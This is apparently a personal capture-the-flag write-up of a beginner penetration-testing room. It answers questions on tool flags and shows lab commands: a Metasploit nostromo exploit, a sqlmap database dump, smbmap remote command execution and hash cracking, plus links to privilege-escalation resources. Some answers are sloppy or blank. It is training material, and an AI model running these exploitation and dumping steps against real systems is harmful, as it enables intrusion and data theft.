# CC: Pen Testing

> Shay Pasvolsky
> Started: 04/10/20 20-04-14
> Finished: 04/10/20 23-38-00

---

---

## General info

```bash
export MIP=10.10.151.56 # For nmap
export MIP=10.10.178.36 # For gobuster
export MIP=10.10.171.46 # For metasploit
export MIP=10.10.118.99 # For sqlmap
export MIP=10.10.93.117 # Final Exam
export MyIP=10.9.134.47
```

### Users

```txt
    User: nyan
        Password: nyan
```

### Open Ports

```txt
    port: 22
        type: tcp
        service: OpenSSH
            version: 7.2p2
            Has Vuln: yes
    port: 80
        type: tcp
        service: 7.2p2
            version: 2.4.18
            Has Vuln: yes
```

---

## Tasks

### Task 1

1. Read the above.

    ```txt
        Hit 'Completed'
    ```

### Task 2

1. What does nmap stand for?

    ```txt
        Network Mapper
    ```

2. How do you specify which port(s) to scan?

    ```txt
        -p
    ```

3. How do you do a "ping scan"(just tests if the host(s) is up)?

    ```txt
        -sn
    ```

4. What is the flag for a UDP scan?

    ```txt
        -sU
    ```

5. How do you run default scripts?

    ```txt
        -sC
    ```

6. How do you enable "aggressive mode"(Enables OS detection, version detection, script scanning, and traceroute)

    ```txt
        -A
    ```

7. What flag enables OS detection?

    ```txt
        -O
    ```

8. How do you get the versions of services running on the target machine?

    ```txt
        -sV
    ```

9. Deploy the machine

    ```txt
        Hit 'Completed'
    ```

10. How many ports are open on the machine?

    ```bash
        sudo nmap -sC -sV -vvv $MIP -oN scans/local/nmap/withvuln
    ```

    ```txt
        1
    ```

11. What service is running on the machine?

    ```txt
        Apache
    ```

12. What is the version of the service?

    ```txt
        2.4.18
    ```

13. What is the output of the http-title script(included in default scripts)

    ```txt
        Apache2 Ubuntu Default Page: It works
    ```

### Task 3

1. How do you listen for connections?

    ```txt
        -l
    ```

2. How do you enable verbose mode(allows you to see who connected to you)?

    ```txt
        -v
    ```

3. How do you specify a port to listen on

    ```txt
        -p
    ```

4. How do you specify which program to execute after you connect to a host(One of the most infamous)?

    ```txt
        -e
    ```

5. How do you connect to udp ports

    ```txt
        -u
    ```

### Task 4

1. How do you specify directory/file brute forcing mode?

    ```txt
        dir
    ```

2. How do you specify dns bruteforcing mode?

    ```txt
        dns
    ```

3. What flag sets extensions to be used?

    Example: if the php extension is set, and the word is "admin" then gobuster will test admin.php against the webserver

    ```txt
        -x
    ```

4. What flag sets a wordlist to be used?

    ```txt
        -w
    ```

5. How do you set the Username for basic authentication(If the directory requires a username/password)?

    ```txt
        -U
    ```

6. How do you set the password for basic authentication?

    ```txt
        -P
    ```

7. How do you set which status codes gobuster will interpret as valid?

    Example: 200,400,404,204

    ```txt
        -s
    ```

8. How do you skip ssl certificate verification?

    ```txt
        -k
    ```

9. How do you specify a User-Agent?

    ```txt
        -a
    ```

10. How do you specify a HTTP header?

    ```txt
        -H
    ```

11. What flag sets the URL to bruteforce?

    ```txt
        -u
    ```

12. Deploy the machine

    ```txt
        Hit 'Completed'
    ```

13. What is the name of the hidden directory

    ```bash
        sudo gobuster dir -u http://10.10.178.36 -o scans/local/gobuster/dir -w /usr/share/wordlists/rockyou.txt
    ```

    ```txt
        secret
    ```

14. What is the name of the hidden file with the extension xxa

    ```bash
        sudo gobuster dir -u http://10.10.178.36 -o scans/local/gobuster/files -w /usr/share/wordlists/rockyou.txt -x xxa
    ```

    ```txt
        password
    ```

### Task 5

1. How do you specify which host to use?

    ```txt
        -h
    ```

2. What flag disables ssl?

    ```txt
        -nossl
    ```

3. How do you force ssl?

    ```txt
        -ssl
    ```

4. How do you specify authentication(username + pass)?

    ```txt
        -id
    ```

5. How do you select which plugin to use?

    ```txt
        -Plugins
    ```

6. Which plugin checks if you can enumerate apache users?

    ```txt
        apacheusers
    ```

7. How do you update the plugin list?

    ```txt
        -update
    ```

8. How do you list all possible plugins to use?

    ```txt
        -list-plugins
    ```

### Task 6

1. Metasploit is one of the most popular penetration testing frameworks around. It contains a large database of almost every major CVE, which you can easily use against a machine. The aim of this section is to go through some of the major features of metasploit, and at the end there will be a machine that you will need to exploit.

    ```txt
        Hit 'Completed'
    ```

### Task 7

1. What command allows you to search modules?

    ```txt
        search
    ```

2. How do you select a module?

    ```txt
        use
    ```

3. How do you display information about a specific module?

    ```txt
        infos
    ```

4. How do you list options that you can set?

    ```txt
        options
    ```

5. What command lets you view advanced options for a specific module?

    ```txt
        advanced
    ```

6. How do you show options in a specific category?

    ```txt
        show
    ```

### Task 8

1. How do you select the eternalblue module?

    ```txt
        use exploit/windows/smb/ms17_010_eternalblue
    ```

2. What option allows you to select the target host(s)?

    ```txt
        RHOSTS
    ```

3. How do you set the target port?

    ```txt
        RPORT
    ```

4. What command allows you to set options?

    ```txt
        set
    ```

5. How would you set SMBPass to "username"?

    ```txt
        set SMBPass username
    ```

6. How would you set the SMBUser to "password"?

    ```txt
        set SMBUser password
    ```

7. What option sets the architecture to be exploited?

    ```txt
        arch
    ```

8. What option sets the payload to be sent to the target machine?

    ```txt
        payload
    ```

9. Once you've finished setting all the required options, how do you run the exploit?

    ```txt
        exploit
    ```

10. What flag do you set if you want the exploit to run in the background?

    ```txt
        -j
    ```

11. How do you list all current sessions?

    ```txt
        sessions
    ```

12. What flag allows you to go into interactive mode with a session("drops you either into a meterpreter or regular shell")

    ```txt
        -i
    ```

### Task 9

1. What command allows you to download files from the machine?

    ```txt
        download
    ```

2. What command allows you to upload files to the machine?

    ```txt
        upload
    ```

3. How do you list all running processes?

    ```txt
        ps
    ```

4. How do you change processes on the victim host(Ideally it will allow you to change users and gain the perms associated with that user)

    ```txt
        migrate
    ```

5. What command lists files in the current directory on the remote machine?

    ```txt
        ls
    ```

6. How do you execute a command on the remote host?

    ```txt
        execute
    ```

7. What command starts an interactive shell on the remote host?

    ```txt
        shell
    ```

8. How do you find files on the target host(Similar function to the linux command "find")

    ```txt
        search
    ```

9. How do you get the output of a file on the remote host?

    ```txt
        cat
    ```

10. How do you put a meterpreter shell into "background mode"(allows you to run other msf modules while also keeping the meterpreter shell as a session)?

    ```txt
        background
    ```

### Task 10

1. Select the module that needs to be exploited

    ```txt
        use exploit/multi/http/nostromo_code_exec
    ```

2. What variable do you need to set, to select the remote host

    ```bash
        set RHOSTS 10.10.171.46
    ```

    ```txt
        RHOSTS
    ```

3. How do you set the port to 80

    ```txt
        set RPORT 80
    ```

4. How do you set listening address(Your machine)

    ```bash
        set LHOST 10.9.134.47
    ```

    ```txt
        LHOST
    ```

5. Exploit the machine!

    ```txt
        Hit 'Completed'
    ```

6. What is the name of the secret directory in the /var/nostromo/htdocs directory?

    ```bash
        exploit
        ls /var/nostromo/htdocs
    ```

    ```txt
        s3cretd1r
    ```

7. What are the contents of the file inside of the directory?

    ```bash
        cat /var/nostromo/htdocs/s3cretd1r/nice
    ```

    ```txt
        Woohoo!
    ```

### Task 11

1. Often times during a pen test, you will gain access to a database. When you investigate the database you will often find a users table, which contains usernames and often hashed passwords. It is often necessary to know how to crack hashed passwords to gain authentication to a website(or if you're lucky a hashed password may work for ssh!).

    ```txt
        Hit 'Completed'
    ```

### Task 12

1. No matter what tool you use, virtually all of them have the exact same format. A file with the hash(s) in it with each hash being separated by a newline.

    Example:

    < hash 1 >

    < hash 2>

    < hash 3>

    Salts are typically appended onto the hash with a colon and the salt. Files with salted hashes still follow the same convention with each hash being separated by a newline.

    Example:

    < hash1>:< salt>

    < hash2>:< salt>

    < hash3>:< salt>

    Note: Different hashing algorithms treat salts differently. Some prepend them and some append them. Research what it is you're trying to crack, and make the distinction.

    ```txt
        Hot 'Completed'
    ```

### Task 13

1. What flag sets the mode.

    ```txt
        -m
    ```

2. What flag sets the "attack mode"

    ```txt
        -a
    ```

3. What is the attack mode number for Brute-force

    ```txt
        3
    ```

4. What is the mode number for SHA3-512

    ```txt
        17600
    ```

5. Crack This Hash:56ab24c15b72a457069c5ea42fcfc640

    Type: MD5

    ```txt
        happy
    ```

6. Crack this hash:

    4bc9ae2b9236c2ad02d81491dcb51d5f

    Type: MD4

    ```txt
        nootnoot
    ```

### Task 14

1. What flag let's you specify which wordlist to use?  

    ```txt
        -wordlist
    ```

2. What flag lets you specify which hash format(Ex: MD5,SHA1 etc.) to use?

    ```txt
        --format
    ```

3. How do you specify which rule to use?

    ```txt
        --rules
    ```

4. Crack this hash:

    5d41402abc4b2a76b9719d911017c592

    Type: MD5

    ```txt
    ```

5. Crack this hash:
    5baa61e4c9b93f3f0682250b6cf8331b7ee68fd8

    Type: SHA1

    ```txt
        password
    ```

### Task 15

1. SQL injection is the art of modifying a SQL query so you can get access to the target's database. This technique is often used to get user's data such as passwords, emails etc. SQL injection is one of the most common web vulnerabilities, and as such, it is highly worth checking for

    ```txt
        Hit 'Completed'
    ```

### Task 16

1. How do you specify which url to check?

    ```txt
        -u
    ```

2. What about which google dork to use?

    ```txt
        -g
    ```

3. How do you select(lol) which parameter to use?(Example: in the url <http://ex.com?test=1> the parameter would be test.)

    ```txt
        -p
    ```

4. What flag sets which database is in the target host's backend?(Example: If the flag is set to mysql then sqlmap will only test mysql injections).

    ```txt
        --dbms
    ```

5. How do you select the level of depth sqlmap should use(Higher = more accurate and more tests in general).

    ```txt
        --level
    ```

6. How do you dump the table entries of the database?

    ```txt
        --dump
    ```

7. Which flag sets which db to enumerate?

    (Case sensitive)

    ```txt
        -D
    ```

8. Which flag sets which table to enumerate?

    (Case sensitive)

    ```txt
        -T
    ```

9. Which flag sets which column to enumerate?

    (Case sensitive)

    ```txt
        -C
    ```

10. How do you ask sqlmap to try to get an interactive os-shell?

    ```txt
        --os-shell
    ```

11. What flag dumps all data from every table

    ```txt
        --dump-all
    ```

### Task 17

1. Occasionally you will be unable to use sqlmap. This can be for a variety of reasons, such as a the target has set up a firewall or a request limit. In this case it is worth knowing how to do basic manual SQL Injection, if only to confirm that there is SQL Injection. A list of ways to check for SQL Injection can be found here.

    Note: As there are various ways to check for sql injection, and it would be difficult to properly convey how to test for sqli given each situation, there will be no questions for this task.

    ```txt
        Hit 'Completed'
    ```

### Task 18

1. Set the url to the machine ip, and run the command

    ```bash
        sqlmap -u "http://10.10.118.99" --forms --dump | tee scans/local/sqlmap/sqlmapbasic
    ```

    ```txt
        Hit 'Completed'
    ```

2. How many types of sqli is the site vulnerable too?

    ```txt
        3
    ```

3. Dump the database.

    ```txt
        Hit 'Completed'
    ```

4. What is the name of the database?

    ```txt
        tests
    ```

5. How many tables are in the database?

    ```txt
        2
    ```

6. What is the value of the flag?

    ```txt
        found_me
    ```

### Task 19

1. Most of the pentesting techniques and tools you've seen so far can be used on both Windows and Linux. However, one of the things you'll find most often when pen testing Windows machines is samba, and it is worth making a section dedicated to enumerating it.

    Note: Samba is cross platform as well, however this section will primarily be focused on Windows enumeration; some of the techniques you see here still apply to Linux as well.

    ```txt
        Hit 'Completed'
    ```

### Task 20

1. How do you set the username to authenticate with?

    ```txt
        -u
    ```

2. What about the password?

    ```txt
        -p
    ```

3. How do you set the host?

    ```txt
        -H
    ```

4. What flag runs a command on the server(assuming you have permissions that is)?

    ```txt
        -x
    ```

5. How do you specify the share to enumerate?

    ```txt
        -s
    ```

6. How do you set which domain to enumerate?

    ```txt
        -d
    ```

7. What flag downloads a file?

    ```txt
        --download
    ```

8. What about uploading one?

    ```txt
        --upload
    ```

9. Given the username "admin", the password "password", and the ip "10.10.10.10", how would you run ipconfig on that machine

    ```txt
        smbmap -u "admin" -p "password" -H 10.10.10.10 -x ipconfig
    ```

### Task 21

1. How do you specify which domain(workgroup) to use when connecting to the host?

    ```txt
        -W
    ```

2. How do you specify the ip address of the host?

    ```txt
        -I
    ```

3. How do you run the command "ipconfig" on the target machine?

    ```txt
        -c "ipconfig"
    ```

4. How do you specify the username to authenticate with?

    ```txt
        -U
    ```

5. How do you specify the password to authenticate with?

    ```txt
        -P
    ```

6. What flag is set to tell smbclient to not use a password?

    ```txt
        -N
    ```

7. While in the interactive prompt, how would you download the file test, assuming it was in the current directory?

    ```txt
        get test
    ```

8. In the interactive prompt, how would you upload your /etc/hosts file

    ```txt
        put /etc/hosts
    ```

### Task 22

1. impacket is a collection of extremely useful windows scripts. It is worth mentioning here, as it has many scripts available that use samba to enumerate and even gain shell access to windows machines. All scripts can be found here.

    Note: impacket has scripts that use other protocols and services besides samba.

    ```txt
        Hit 'Completed'
    ```

2. a

    ```bash
    ```

    ```txt
    ```

### Task 23

1. see text

    ```txt
    privilege escalation is such a large topic that it would be impossible to do it proper justice in this type of room. However, it is a necessary topic that must be covered, so rather than making a task with questions, I shall provide you all with some resources.

    General:

    https://github.com/swisskyrepo/PayloadsAllTheThings (A bunch of tools and payloads for every stage of pentesting)


    Linux:

    https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ (a bit old but still worth looking at)

    https://github.com/rebootuser/LinEnum( One of the most popular priv esc scripts)

    https://github.com/diego-treitos/linux-smart-enumeration/blob/master/lse.sh (Another popular script)

    https://github.com/mzet-/linux-exploit-suggester (A Script that's dedicated to searching for kernel exploits)


    https://gtfobins.github.io (I can not overstate the usefulness of this for priv esc, if a common binary has special permissions, you can use this site to see how to get root perms with it.)


    Windows:


    https://www.fuzzysecurity.com/tutorials/16.html  (Dictates some very useful commands and methods to enumerate the host and gain intel)


    https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerUp (A bit old but still an incredibly useful script)


    https://github.com/411Hall/JAWS (A general enumeration script)
    ```

    ```txt
        Hit 'Completed'
    ```

### Task 24

1. What is the user.txt

    ```txt
        supernootnoot

    ```

2. What is the root.txt

    ```txt
        congratulations!!!!
    ```
